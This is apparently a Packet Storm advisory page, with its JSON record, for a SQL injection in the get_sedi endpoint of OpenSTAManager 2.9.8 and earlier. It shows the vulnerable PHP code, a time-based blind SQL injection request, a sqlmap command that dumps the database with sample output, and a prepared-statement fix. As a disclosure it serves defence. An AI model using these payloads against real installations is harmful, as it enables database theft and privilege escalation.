📄 OpenSTAManager 2.9.8 SQL Injection_PACKETSTORM:218749

8.8 / 10

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Description

OpenSTAManager versions 2.9.8 and below suffer from a remote SQL injection vulnerability in ajaxcomplete.php...

Visit Original Source

Basic Information

ID PACKETSTORM:218749

Published Apr 13, 2026 at 00:00

Affected Product

Affected Versions # CVE-2025-69213: OpenSTAManager has a SQL Injection in ajax_complete.php (get_sedi endpoint)

## Overview

| Field | Details |
|---|---|
| **CVE ID** | [CVE-2025-69213](https://nvd.nist.gov/vuln/detail/CVE-2025-69213) |
| **Severity** | HIGH |
| **Advisory** | [View Advisory](https://github.com/devcode-it/openstamanager/security/advisories/GHSA-w995-ff8h-rppg) |
| **Discovered by** | [Lukasz Rybak](https://github.com/lukasz-rybak) |

## Affected Products

- **devcode-it/openstamanager** (versions: <= 2.9.8)

## CWE Classification

- CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

## Details

## Summary
A SQL Injection vulnerability exists in the `ajax_complete.php` endpoint when handling the `get_sedi` operation. An authenticated attacker can inject malicious SQL code through the `idanagrafica` parameter, leading to unauthorized database access.

## Proof of Concept

### Vulnerable Code
**File:** `modules/anagrafiche/ajax/complete.php:28`

```php
case 'get_sedi':
$idanagrafica = get('idanagrafica');
$q = "SELECT id, CONCAT_WS( ' - ', nomesede, citta ) AS descrizione
FROM an_sedi
WHERE idanagrafica='".$idanagrafica."' ...";
$rs = $dbo->fetchArray($q);
```

### Data Flow
1. **Source:** `$_GET['idanagrafica']` → `get('idanagrafica')`
2. **Vulnerable:** User input concatenated directly into SQL query with single quotes
3. **Sink:** `$dbo->fetchArray($q)` executes the malicious query

### Exploit

**Manual PoC (Time-based Blind SQLi):**
```http
GET /ajax_complete.php?op=get_sedi&idanagrafica=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1 HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=<valid-session>
```
<img width="1304" height="580" alt="image" src="https://github.com/user-attachments/assets/4ffcdacf-d56c-4a44-ad95-d6cecd0f05c8" />

**SQLMap Exploitation:**
```bash
sqlmap -u "http://localhost:8081/ajax_complete.php?op=get_sedi&idanagrafica=1*" \
--cookie="PHPSESSID=<session>" \
--dbms=MySQL \
--technique=T \
--level=3 \
--dump
```

**SQLMap Output:**
```
[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Parameter: #1* (URI)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: idanagrafica=1' AND (SELECT 2572 FROM (SELECT(SLEEP(5)))oOnc)-- rhVF
back-end DBMS: MySQL >= 5.0.12
```

<img width="1284" height="745" alt="image" src="https://github.com/user-attachments/assets/5c640132-4f52-46bd-96fa-14d9987d4759" />

## Impact
- **Data Exfiltration:** Complete database extraction including user credentials, customer data, financial records
- **Privilege Escalation:** Modification of `zz_users` table to gain admin access
- **Data Integrity:** Unauthorized modification or deletion of records
- **Potential RCE:** Via `SELECT ... INTO OUTFILE` if file permissions allow

## Affected Versions
- OpenSTAManager: Verified in latest version (as of December 2025)
- All versions using this endpoint are likely affected

## Remediation

Replace direct concatenation with prepared statements:

**Before:**
```php
$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica='".$idanagrafica."' ...";
```

**After:**
```php
$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica=".prepare($idanagrafica)." ...";
```

## References
- OWASP SQL Injection: https://owasp.org/www-community/attacks/SQL_Injection
- CWE-89: Improper Neutralization of Special Elements used in an SQL Command

## Credit
Discovered by: Łukasz Rybak

## References

- https://github.com/devcode-it/openstamanager/security/advisories/GHSA-w995-ff8h-rppg
- https://nvd.nist.gov/vuln/detail/CVE-2025-69213
- https://github.com/advisories/GHSA-w995-ff8h-rppg

## Disclaimer

This CVE was responsibly disclosed following coordinated vulnerability disclosure practices. The information provided here is for educational and defensive purposes only.

{
    "lastseen": "2026-04-13T15:50:15",
    "description": "OpenSTAManager versions 2.9.8 and below suffer from a remote SQL injection vulnerability in ajaxcomplete.php...",
    "published": "2026-04-13T00:00:00",
    "modified": "2026-04-13T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:218749",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-69213"
    ],
    "sourceData": "# CVE-2025-69213: OpenSTAManager has a SQL Injection in ajax_complete.php (get_sedi endpoint)\n    \n    ## Overview\n    \n    | Field | Details |\n    |---|---|\n    | **CVE ID** | [CVE-2025-69213](https://nvd.nist.gov/vuln/detail/CVE-2025-69213) |\n    | **Severity** | HIGH |\n    | **Advisory** | [View Advisory](https://github.com/devcode-it/openstamanager/security/advisories/GHSA-w995-ff8h-rppg) |\n    | **Discovered by** | [Lukasz Rybak](https://github.com/lukasz-rybak) |\n    \n    ## Affected Products\n    \n    - **devcode-it/openstamanager** (versions: <= 2.9.8)\n    \n    \n    ## CWE Classification\n    \n    - CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')\n    \n    ## Details\n    \n    ## Summary\n    A SQL Injection vulnerability exists in the `ajax_complete.php` endpoint when handling the `get_sedi` operation. An authenticated attacker can inject malicious SQL code through the `idanagrafica` parameter, leading to unauthorized database access.\n    \n    \n    ## Proof of Concept\n    \n    ### Vulnerable Code\n    **File:** `modules/anagrafiche/ajax/complete.php:28`\n    \n    ```php\n    case 'get_sedi':\n        $idanagrafica = get('idanagrafica');\n        $q = \"SELECT id, CONCAT_WS( ' - ', nomesede, citta ) AS descrizione \n              FROM an_sedi \n              WHERE idanagrafica='\".$idanagrafica.\"' ...\";\n        $rs = $dbo->fetchArray($q);\n    ```\n    \n    ### Data Flow\n    1. **Source:** `$_GET['idanagrafica']` \u2192 `get('idanagrafica')`\n    2. **Vulnerable:** User input concatenated directly into SQL query with single quotes\n    3. **Sink:** `$dbo->fetchArray($q)` executes the malicious query\n    \n    ### Exploit\n    \n    **Manual PoC (Time-based Blind SQLi):**\n    ```http\n    GET /ajax_complete.php?op=get_sedi&idanagrafica=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1 HTTP/1.1\n    Host: localhost:8081\n    Cookie: PHPSESSID=<valid-session>\n    ```\n    <img width=\"1304\" height=\"580\" alt=\"image\" src=\"https://github.com/user-attachments/assets/4ffcdacf-d56c-4a44-ad95-d6cecd0f05c8\" />\n    \n    **SQLMap Exploitation:**\n    ```bash\n    sqlmap -u \"http://localhost:8081/ajax_complete.php?op=get_sedi&idanagrafica=1*\" \\\n      --cookie=\"PHPSESSID=<session>\" \\\n      --dbms=MySQL \\\n      --technique=T \\\n      --level=3 \\\n      --dump\n    ```\n    \n    **SQLMap Output:**\n    ```\n    [INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable\n    Parameter: #1* (URI)\n        Type: time-based blind\n        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n        Payload: idanagrafica=1' AND (SELECT 2572 FROM (SELECT(SLEEP(5)))oOnc)-- rhVF\n    back-end DBMS: MySQL >= 5.0.12\n    ```\n    \n    <img width=\"1284\" height=\"745\" alt=\"image\" src=\"https://github.com/user-attachments/assets/5c640132-4f52-46bd-96fa-14d9987d4759\" />\n    \n    \n    ## Impact\n    - **Data Exfiltration:** Complete database extraction including user credentials, customer data, financial records\n    - **Privilege Escalation:** Modification of `zz_users` table to gain admin access\n    - **Data Integrity:** Unauthorized modification or deletion of records\n    - **Potential RCE:** Via `SELECT ... INTO OUTFILE` if file permissions allow\n    \n    ## Affected Versions\n    - OpenSTAManager: Verified in latest version (as of December 2025)\n    - All versions using this endpoint are likely affected\n    \n    ## Remediation\n    \n    Replace direct concatenation with prepared statements:\n    \n    **Before:**\n    ```php\n    $idanagrafica = get('idanagrafica');\n    $q = \"SELECT ... WHERE idanagrafica='\".$idanagrafica.\"' ...\";\n    ```\n    \n    **After:**\n    ```php\n    $idanagrafica = get('idanagrafica');\n    $q = \"SELECT ... WHERE idanagrafica=\".prepare($idanagrafica).\" ...\";\n    ```\n    \n    ## References\n    - OWASP SQL Injection: https://owasp.org/www-community/attacks/SQL_Injection\n    - CWE-89: Improper Neutralization of Special Elements used in an SQL Command\n    \n    ## Credit\n    Discovered by: \u0141ukasz Rybak\n    \n    ## References\n    \n    - https://github.com/devcode-it/openstamanager/security/advisories/GHSA-w995-ff8h-rppg\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-69213\n    - https://github.com/advisories/GHSA-w995-ff8h-rppg\n    \n    \n    ## Disclaimer\n    \n    This CVE was responsibly disclosed following coordinated vulnerability disclosure practices. The information provided here is for educational and defensive purposes only.",
    "sourceHref": "https://packetstorm.news/download/218749",
    "cvss": {
        "score": 8.8,
        "severity": "HIGH",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/218749/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply